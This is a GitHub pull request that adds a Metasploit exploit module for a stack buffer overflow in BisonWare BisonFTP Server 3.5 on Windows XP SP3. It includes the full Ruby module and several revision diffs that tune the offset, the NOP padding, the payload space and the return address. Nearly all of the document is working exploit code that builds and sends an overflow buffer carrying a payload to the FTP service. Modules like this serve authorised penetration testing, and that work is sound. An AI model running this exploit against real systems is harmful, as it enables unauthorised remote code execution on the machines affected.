### PR TITLE
Create bison_ftp_bof.rb (Bisonware BisonFTP Server 3.5 BoF)

### DIFF
--- a/modules/exploits/windows/ftp/bison_ftp_bof.rb
+++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb
@@ -1,0 +1,91 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'			 => 'BisonWare BisonFTP Server Buffer Overflow',
+      'Description'	 => %q{
+        BisonWare BisonFTP Server 3.5 is prone to an overflow condition.
+        This module exploits a buffer overflow vulnerability in the said
+        application.
+      },
+      'Platform'		 => 'win',
+      'Author'		 =>
+        [
+          'localh0t', # initial discovery
+          'veerendragg @ SecPod', # initial msf
+          'Jay Turla' # msf
+        ],
+      'License'		 => MSF_LICENSE,
+      'References'	 =>
+        [
+          [ 'CVE', '1999-1510'],
+          [ 'BID', '49109'],
+          [ 'EDB', '17649'],
+          [ 'URL', 'http://secpod.org/msf/bison_server_bof.rb']
+        ],
+      'Privileged'	 => false,
+      'DefaultOptions' =>
+        {
+          'VERBOSE'  => true
+        },
+      'Payload'		 =>
+        {
+          'Space'          => 385,
+          'BadChars'       => "\x00\x0a\x0d",
+        },
+      'Targets'		=>
+        [
+          [ 'Bisonware FTP Server / Windows XP SP3 EN',
+            {
+              'Ret' => 0x0040333f,
+              'Offset'   => 1432
+            }
+          ],
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Aug 07 2011'))
+  end
+
+  def check
+    connect_login
+    disconnect
+    if /BisonWare BisonFTP server product V3\.5/i === banner
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    connect
+    print_status('Triggering the prompt for an unregistered product')
+    sock.put('')
+    print_status('Disconnecting...')
+    disconnect
+
+    print_status('Connecting for the second time to deliver our payload...')
+    connect #connect for the second time
+
+    buf = rand_text_alpha(1028)
+    buf << "\x90" * 16
+    buf << payload.encoded
+    buf << "\x90" * (388 - payload.encoded.length)
+    buf << [target.ret].pack('V')
+    buf << rand_text_alpha(39)
+    print_status('Sending payload...')
+
+    sock.put(buf)
+    handler
+    disconnect
+  end
+end

--- a/modules/exploits/windows/ftp/bison_ftp_bof.rb
+++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb
@@ -77,9 +77,9 @@ class Metasploit4 < Msf::Exploit::Remote
     connect #connect for the second time
 
     buf = rand_text_alpha(1028)
-    buf << "\x90" * 16
+    buf << make_nops(16)
     buf << payload.encoded
-    buf << "\x90" * (388 - payload.encoded.length)
+    buf << make_nops(388 - payload.encoded.length)
     buf << [target.ret].pack('V')
     buf << rand_text_alpha(39)
     print_status('Sending payload...')

--- a/modules/exploits/windows/ftp/bison_ftp_bof.rb
+++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb
@@ -42,6 +42,7 @@ class Metasploit4 < Msf::Exploit::Remote
         {
           'Space'          => 385,
           'BadChars'       => "\x00\x0a\x0d",
+          'StackAdjustment' => -3500,
         },
       'Targets'		=>
         [

--- a/modules/exploits/windows/ftp/bison_ftp_bof.rb
+++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb
@@ -40,7 +40,7 @@ class Metasploit4 < Msf::Exploit::Remote
         },
       'Payload'		 =>
         {
-          'Space'          => 385,
+          'Space'          => 310,
           'BadChars'       => "\x00\x0a\x0d",
           'StackAdjustment' => -3500,
         },

--- a/modules/exploits/windows/ftp/bison_ftp_bof.rb
+++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb
@@ -22,7 +22,7 @@ class Metasploit4 < Msf::Exploit::Remote
       'Author'		 =>
         [
           'localh0t', # initial discovery
-          'veerendragg', # initial msf
+          'veerendragg @ SecPod', # initial msf
           'Jay Turla' # msf
         ],
       'License'		 => MSF_LICENSE,
@@ -48,7 +48,7 @@ class Metasploit4 < Msf::Exploit::Remote
           [ 'Bisonware FTP Server / Windows XP SP3 EN',
             {
               'Ret' => 0x0040333f,
-              'Offset'   => 1432
+              'Offset'   => 1028
             }
           ],
         ],
@@ -76,7 +76,7 @@ class Metasploit4 < Msf::Exploit::Remote
     print_status('Connecting for the second time to deliver our payload...')
     connect #connect for the second time
 
-    buf = rand_text_alpha(1028)
+    buf = rand_text_alpha(target['Offset'])
     buf << make_nops(16)
     buf << payload.encoded
     buf << make_nops(388 - payload.encoded.length)

--- a/modules/exploits/windows/ftp/bison_ftp_bof.rb
+++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb
@@ -48,7 +48,8 @@ class Metasploit4 < Msf::Exploit::Remote
           [ 'Bisonware FTP Server / Windows XP SP3 EN',
             {
               'Ret' => 0x0040333f,
-              'Offset'   => 1028
+              'Offset'   => 1028,
+              'Nops'     =>  404
             }
           ],
         ],
@@ -77,9 +78,8 @@ class Metasploit4 < Msf::Exploit::Remote
     connect #connect for the second time
 
     buf = rand_text_alpha(target['Offset'])
-    buf << make_nops(16)
     buf << payload.encoded
-    buf << make_nops(388 - payload.encoded.length)
+    buf << make_nops( (target['Nops']) - payload.encoded.length)
     buf << [target.ret].pack('V')
     print_status('Sending payload...')
 

--- a/modules/exploits/windows/ftp/bison_ftp_bof.rb
+++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb
@@ -81,7 +81,6 @@ class Metasploit4 < Msf::Exploit::Remote
     buf << payload.encoded
     buf << make_nops(388 - payload.encoded.length)
     buf << [target.ret].pack('V')
-    buf << rand_text_alpha(39)
     print_status('Sending payload...')
 
     sock.put(buf)

--- a/modules/exploits/windows/ftp/bison_ftp_bof.rb
+++ b/modules/exploits/windows/ftp/bison_ftp_bof.rb
@@ -22,7 +22,7 @@ class Metasploit4 < Msf::Exploit::Remote
       'Author'		 =>
         [
           'localh0t', # initial discovery
-          'veerendragg @ SecPod', # initial msf
+          'veerendragg', # initial msf
           'Jay Turla' # msf
         ],
       'License'		 => MSF_LICENSE,


### PR DESCRIPTION
This module exploits a buffer overflow vulnerability in Bisonware BisonFTP Server 3.5 and tested on Windows XP Service Pack 3 EN.

An original msf has been created by veerendragg but it's kinda unreliable and was not pushed on this repo. It is because of the FTP's prompt as shown on the image below wherein you need to login again in order to trigger the exploit. I added a check method and some fixes for the original msf and still using the same offset and return pointer
.
![image](https://cloud.githubusercontent.com/assets/3483615/11289315/83a4dbce-8f66-11e5-9fa0-43aee645dc57.png)

PoC: ![image](https://cloud.githubusercontent.com/assets/3483615/11289291/392494ae-8f66-11e5-8442-8faf6ff1afa0.png)
